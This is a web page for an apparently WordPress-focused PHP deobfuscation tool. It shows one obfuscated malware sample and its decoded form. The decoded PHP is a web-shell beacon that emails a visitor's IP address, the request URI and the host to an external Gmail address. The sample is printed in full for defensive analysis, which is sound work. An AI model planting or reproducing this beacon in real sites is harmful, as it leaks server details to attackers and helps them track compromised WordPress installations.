Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php ${"G\x4cO\x42\x41L\x53"}["\x79a\x72b\x78w\x78\x5f\x7a\x6a\x76\x6a\x62\x68l\x65o\x69z\x73\x5fx\x66\x79_\x68c"]="\x69p";${"\x47\x4c\x4f\x42A\x4c\x53"}["_\x75\x62\x63\x68\x68m\x71d\x5fe\x63f\x6fw\x5fp\x71\x66g\x68\x79g\x75_\x61k\x67\x5fw\x74q\x70\x5fk\x6dl\x6ay"]="r\x614\x34";${"G\x4c\x4fB\x41...



Obfuscated php code

<?php ${"G\x4cO\x42\x41L\x53"}["\x79a\x72b\x78w\x78\x5f\x7a\x6a\x76\x6a\x62\x68l\x65o\x69z\x73\x5fx\x66\x79_\x68c"]="\x69p";${"\x47\x4c\x4f\x42A\x4c\x53"}["_\x75\x62\x63\x68\x68m\x71d\x5fe\x63f\x6fw\x5fp\x71\x66g\x68\x79g\x75_\x61k\x67\x5fw\x74q\x70\x5fk\x6dl\x6ay"]="r\x614\x34";${"G\x4c\x4fB\x41L\x53"}["c\x77\x74g\x67d\x7az\x7a_\x64f\x5f\x71k\x77\x79\x75d\x6bk\x65\x68y\x6dl\x6b\x75a\x70\x5f\x72\x68\x75\x77"]="\x73\x75b\x6a9\x38";${"G\x4cO\x42\x41L\x53"}["g\x67c\x7a\x67\x74i\x66\x62j\x6er\x79\x6eb\x68s\x79z\x72\x65p\x70"]="e\x6da\x69l";${"\x47L\x4f\x42A\x4cS"}["\x61\x5f\x63v\x70\x6el\x6d\x74k\x70t\x69\x5ff\x6du\x62\x5fh\x6e_\x7a\x6f\x76\x61"]="\x66r\x6f\x6d";${"\x47\x4cO\x42A\x4cS"}["\x5f\x77\x6ac\x76l\x62\x71u\x7ao\x75g\x73\x75f\x77\x64\x76\x73\x6a\x6dh\x63_\x75z\x66"]="\x614\x35";${"G\x4c\x4fB\x41\x4cS"}["\x61\x6d\x79\x70v\x62_\x74d\x65j\x6b\x5f\x5fb\x74y\x71\x6fv\x75_\x6b\x6e\x76\x69\x68g\x74e\x70\x63s\x5f"]="_\x53\x45\x52\x56E\x52";${"G\x4cO\x42\x41L\x53"}["\x70\x74\x79\x6b_\x6bj\x70\x6b\x70i\x6ao\x79f\x78\x79\x72b\x77c\x70"]="b\x37\x35";${"\x47\x4cO\x42A\x4cS"}["z\x76c\x63m\x67\x64c\x6ed\x78i\x65\x6e\x65c\x6e\x72\x6dc\x6az\x7av\x6fz"]="\x6d2\x32";${"G\x4c\x4fB\x41L\x53"}["w\x68d\x64i\x78w\x69j\x74y\x77_\x69\x6fs\x6ei\x64\x70_\x68c\x70h\x64_\x70s\x68\x73f\x5fd\x6ea"]="m\x73g\x388\x373";${${"\x47L\x4fB\x41\x4c\x53"}["\x79a\x72b\x78w\x78\x5f\x7a\x6a\x76\x6a\x62\x68l\x65o\x69z\x73\x5fx\x66\x79_\x68c"]}=getenv("REMOTE_ADDR");${${"\x47\x4cO\x42A\x4cS"}["_\x75\x62\x63\x68\x68m\x71d\x5fe\x63f\x6fw\x5fp\x71\x66g\x68\x79g\x75_\x61k\x67\x5fw\x74q\x70\x5fk\x6dl\x6ay"]}=rand(1,99999);${${"\x47L\x4fB\x41L\x53"}["c\x77\x74g\x67d\x7az\x7a_\x64f\x5f\x71k\x77\x79\x75d\x6bk\x65\x68y\x6dl\x6b\x75a\x70\x5f\x72\x68\x75\x77"]}="L\x6fg\x67e\x72\x20\x4ei\x68";${${"\x47\x4c\x4fB\x41\x4c\x53"}["g\x67c\x7a\x67\x74i\x66\x62j\x6er\x79\x6eb\x68s\x79z\x72\x65p\x70"]}="\x74\x6f\x75\x74\x72g\x6fd\x69n\x67@\x67\x6d\x61\x69l\x2e\x63\x6f\x6d";${${"\x47L\x4fB\x41L\x53"}["\x61\x5f\x63v\x70\x6el\x6d\x74k\x70t\x69\x5ff\x6du\x62\x5fh\x6e_\x7a\x6f\x76\x61"]}="S\x68e\x6c\x6c \x4b\x61m\x75\x75u";${${"\x47\x4cO\x42A\x4cS"}["\x5f\x77\x6ac\x76l\x62\x71u\x7ao\x75g\x73\x75f\x77\x64\x76\x73\x6a\x6dh\x63_\x75z\x66"]}=${${"\x47L\x4f\x42A\x4c\x53"}["\x61\x6d\x79\x70v\x62_\x74d\x65j\x6b\x5f\x5fb\x74y\x71\x6fv\x75_\x6b\x6e\x76\x69\x68g\x74e\x70\x63s\x5f"]}['REQUEST_URI'];${${"G\x4c\x4fB\x41L\x53"}["\x70\x74\x79\x6b_\x6bj\x70\x6b\x70i\x6ao\x79f\x78\x79\x72b\x77c\x70"]}=${${"G\x4c\x4f\x42A\x4c\x53"}["\x61\x6d\x79\x70v\x62_\x74d\x65j\x6b\x5f\x5fb\x74y\x71\x6fv\x75_\x6b\x6e\x76\x69\x68g\x74e\x70\x63s\x5f"]}['HTTP_HOST'];${${"\x47L\x4fB\x41L\x53"}["z\x76c\x63m\x67\x64c\x6ed\x78i\x65\x6e\x65c\x6e\x72\x6dc\x6az\x7av\x6fz"]}=${${"\x47L\x4fB\x41\x4c\x53"}["\x79a\x72b\x78w\x78\x5f\x7a\x6a\x76\x6a\x62\x68l\x65o\x69z\x73\x5fx\x66\x79_\x68c"]}."";${${"\x47L\x4f\x42A\x4cS"}["w\x68d\x64i\x78w\x69j\x74y\x77_\x69\x6fs\x6ei\x64\x70_\x68c\x70h\x64_\x70s\x68\x73f\x5fd\x6ea"]}="${${"G\x4c\x4fB\x41\x4cS"}["\x5f\x77\x6ac\x76l\x62\x71u\x7ao\x75g\x73\x75f\x77\x64\x76\x73\x6a\x6dh\x63_\x75z\x66"]}\x20${${"\x47L\x4fB\x41\x4cS"}["\x70\x74\x79\x6b_\x6bj\x70\x6b\x70i\x6ao\x79f\x78\x79\x72b\x77c\x70"]}\x20${${"G\x4cO\x42\x41L\x53"}["z\x76c\x63m\x67\x64c\x6ed\x78i\x65\x6e\x65c\x6e\x72\x6dc\x6az\x7av\x6fz"]}";mail(${${"G\x4cO\x42A\x4c\x53"}["g\x67c\x7a\x67\x74i\x66\x62j\x6er\x79\x6eb\x68s\x79z\x72\x65p\x70"]},${${"G\x4cO\x42A\x4c\x53"}["c\x77\x74g\x67d\x7az\x7a_\x64f\x5f\x71k\x77\x79\x75d\x6bk\x65\x68y\x6dl\x6b\x75a\x70\x5f\x72\x68\x75\x77"]},${${"G\x4cO\x42A\x4cS"}["w\x68d\x64i\x78w\x69j\x74y\x77_\x69\x6fs\x6ei\x64\x70_\x68c\x70h\x64_\x70s\x68\x73f\x5fd\x6ea"]},${${"\x47L\x4f\x42A\x4cS"}["\x61\x5f\x63v\x70\x6el\x6d\x74k\x70t\x69\x5ff\x6du\x62\x5fh\x6e_\x7a\x6f\x76\x61"]}); ?>

Decoded(de-Obfuscated) php code

<?php

$GLOBALS["yarbxwx_zjvjbhleoizs_xfy_hc"] = "ip";
$GLOBALS["_ubchhmqd_ecfow_pqfghygu_akg_wtqp_kmljy"] = "ra44";
$GLOBALS["cwtggdzzz_df_qkwyudkkehymlkuap_rhuw"] = "subj98";
$GLOBALS["ggczgtifbjnrynbhsyzrepp"] = "email";
$GLOBALS["a_cvpnlmtkpti_fmub_hn_zova"] = "from";
$GLOBALS["_wjcvlbquzougsufwdvsjmhc_uzf"] = "a45";
$GLOBALS["amypvb_tdejk__btyqovu_knvihgtepcs_"] = "_SERVER";
$GLOBALS["ptyk_kjpkpijoyfxyrbwcp"] = "b75";
$GLOBALS["zvccmgdcndxienecnrmcjzzvoz"] = "m22";
$GLOBALS["whddixwijtyw_iosnidp_hcphd_pshsf_dna"] = "msg8873";
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1, 99999);
$subj98 = "Logger Nih";
$email = "toutrgoding@gmail.com";
$from = "Shell Kamuuu";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$msg8873 = "{$a45} {$b75} {$m22}";
mail($email, $subj98, $msg8873, $from);


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.